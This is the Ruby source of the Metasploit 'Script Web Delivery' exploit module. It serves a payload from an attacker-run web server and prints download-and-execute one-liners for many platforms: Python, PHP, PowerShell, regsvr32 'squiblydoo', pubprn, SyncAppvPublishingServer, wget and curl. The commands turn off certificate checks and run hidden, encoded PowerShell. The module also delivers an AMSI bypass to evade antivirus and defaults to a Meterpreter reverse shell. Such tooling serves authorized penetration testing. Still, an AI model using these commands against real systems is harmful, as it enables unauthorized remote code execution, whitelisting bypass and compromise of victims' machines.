## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Script Web Delivery', 'Description' => %q{ This module quickly fires up a web server that serves a payload. The module will provide a command to be run on the target machine based on the selected target. The provided command will download and execute a payload using either a specified scripting language interpreter or "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses "squiblydoo" technique to bypass application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Similarly, the pubprn target uses the pubprn.vbs script to request and execute a .sct file. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe Microsoft signed binary to request and execute a PowerShell script. This technique only works on Windows 10 builds <= 1709. "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded and executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) 'Trenton Ivey', # AppLocker MSF Module (kn0) 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features 'bcoles', # support for targets: pubprn, SyncAppvPublishingServer and Linux wget 'Matt Nelson', # @enigma0x3 // pubprn discovery 'phra', # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass 'Nick Landers', # @monoxgas // SyncAppvPublishingServer discovery ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp', 'Powershell::exec_in_place' => true }, 'References' => [ ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], ['URL', 'http://web.archive.org/web/20171026182440/http://subt0x10.blogspot.com:80/2017/04/bypass-application-whitelisting-script.html'], ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'], ['URL', 'https://iwantmore.pizza/posts/amsi.html'], ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/'], ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/'], ['URL', 'https://lolbas-project.github.io/lolbas/Scripts/Pubprn/'], ], 'Platform' => %w[python php win linux osx], 'Targets' => [ [ 'Python', { 'Platform' => 'python', 'Arch' => ARCH_PYTHON } ], [ 'PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ], [ 'PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Regsvr32', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'pubprn', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'SyncAppvPublishingServer', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'PSH (Binary)', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Mac OS X', { 'Platform' => 'osx', 'Arch' => [ARCH_X86, ARCH_X64] } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2013-07-19', 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_advanced_options( [ OptBool.new('PSH-AmsiBypass', [ true, 'PSH - Request AMSI/SBL bypass before the stager', true ]), OptString.new('PSH-AmsiBypassURI', [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]), OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', true ]), OptBool.new('PSH-ForceTLS12', [ true, 'PSH - Force use of TLS v1.2', true ]), OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), ] ) end def primer print_status('Run the following command on the target machine:') case target.name when 'PHP' print_line(%(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));")) when 'Python' print_line(%(python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}', context=ssl._create_unverified_context());exec(r.read());")) when 'PSH' uri = get_uri if datastore['PSH-AmsiBypass'] amsi_uri = uri + amsi_bypass_uri print_line(gen_psh([amsi_uri, uri], 'string').to_s) else print_line(gen_psh(uri, 'string').to_s) end when 'pubprn' print_line(%(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct)) when 'SyncAppvPublishingServer' print_line(%(SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('#{get_uri}') | IEX")) when 'Regsvr32' print_line(%(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)) when 'PSH (Binary)' psh = gen_psh(get_uri.to_s, 'download') print_line(psh.to_s) when 'Linux' fname = Rex::Text.rand_text_alphanumeric(8) print_line("wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}& disown") when 'Mac OS X' fname = Rex::Text.rand_text_alphanumeric(8) print_line("curl -sk --output #{fname} #{get_uri}; chmod +x #{fname}; ./#{fname}& disown") end end def amsi_bypass_uri unless datastore['PSH-AmsiBypassURI'].empty? @amsi_uri = datastore['PSH-AmsiBypassURI'] end @amsi_uri ||= random_uri end def on_request_uri(cli, request) if request.raw_uri.to_s.ends_with?('.sct') print_status('Handling .sct Request') psh = gen_psh(get_uri.to_s, 'string') case target.name when 'pubprn' data = gen_pubprn_sct_file(psh) when 'Regsvr32' data = gen_sct_file(psh) else print_error('Unexpected request for .sct file') end send_response(cli, data, 'Content-Type' => 'text/plain') return end if request.raw_uri.to_s.ends_with?(amsi_bypass_uri) data = bypass_powershell_protections print_status("Delivering AMSI Bypass (#{data.length} bytes)") send_response(cli, data, 'Content-Type' => 'text/plain') return end case target.name when 'Linux', 'Mac OS X', 'PSH (Binary)' data = generate_payload_exe when 'PSH', 'Regsvr32', 'pubprn', 'SyncAppvPublishingServer' data = cmd_psh_payload( payload.encoded, payload_instance.arch.first ) else data = payload.encoded.to_s end print_status("Delivering Payload (#{data.length} bytes)") send_response(cli, data, 'Content-Type' => 'application/octet-stream') end def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore['PSH-ForceTLS12'] if method.include? 'string' download_string = datastore['PSH-Proxy'] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url) else # Random filename to use, if there isn't anything set random = "#{rand_text_alphanumeric(8)}.exe" # Set filename (Use random filename if empty) filename = datastore['PSHBinary-FILENAME'].blank? ? random : datastore['PSHBinary-FILENAME'] # Set path (Use %TEMP% if empty) path = datastore['PSHBinary-PATH'].blank? ? '$env:temp' : %('#{datastore['PSHBinary-PATH']}') # Join Path and Filename file = %(echo (#{path}+'\\#{filename}')) # Generate download PowerShell command download_string = Rex::Powershell::PshMethods.download_run(url, file) end download_and_run = "#{force_tls12}#{ignore_cert}#{download_string}" # Generate main PowerShell command if datastore['PSH-EncodedCommand'] download_and_run = encode_script(download_and_run) return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: download_and_run) end return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) end def rand_class_id "#{Rex::Text.rand_text_hex(8)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(12)}" end def gen_sct_file(command) %{} end def gen_pubprn_sct_file(command) %{} end end